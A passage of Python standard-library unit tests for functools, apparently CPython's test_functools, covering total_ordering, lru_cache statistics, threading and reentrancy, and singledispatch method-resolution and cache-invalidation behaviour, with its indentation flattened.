def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_hash_only_once(self):
        # To protect against weird reentrancy bugs and to improve
        # efficiency when faced with slow __hash__ methods, the
        # LRU cache guarantees that it will call __hash__
        # only once per use as an argument to the cached function.
@self.module.lru_cache(maxsize=1)
def f(x, y):
return x * 3 + y
# Simulate the integer 5
mock_int = unittest.mock.Mock()
mock_int.__mul__ = unittest.mock.Mock(return_value=15)
mock_int.__hash__ = unittest.mock.Mock(return_value=999)
# Add to cache: One use as an argument gives one call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 1)
self.assertEqual(f.cache_info(), (0, 1, 1, 1))
# Cache hit: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 1, 1, 1))
        # Cache eviction: No use as an argument gives no additional call
self.assertEqual(f(6, 2), 20)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 2, 1, 1))
# Cache miss: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 3)
self.assertEqual(f.cache_info(), (1, 3, 1, 1))
def test_lru_reentrancy_with_len(self):
# Test to make sure the LRU cache code isn't thrown-off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
old_len = builtins.len
try:
builtins.len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
builtins.len = old_len
def test_lru_star_arg_handling(self):
# Test regression that arose in ea064ff3c10f
@functools.lru_cache()
def f(*args):
return args
self.assertEqual(f(1, 2), (1, 2))
self.assertEqual(f((1, 2)), ((1, 2),))
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=-10, currsize=1))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with support.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
                # XXX: Why might these not be equal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with support.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with support.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with support.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_early_detection_of_bad_call(self):
# Issue #22184
with self.assertRaises(TypeError):
@functools.lru_cache
def f():
pass
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
        # Note: in the assert above, g.dispatch(object) is not g itself;
        # @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, c.OrderedDict]
for haystack in permutations(bases):
m = mro(c.ChainMap, haystack)
self.assertEqual(m, [c.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(c.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [c.defaultdict, dict, c.Sized, c.Container,
object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(c.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
c.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(c.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, c.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(c.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(c.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
_orig_wkd = functools.WeakKeyDictionary
td = TracingDict()
functools.WeakKeyDictionary = lambda: td
c = collections
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
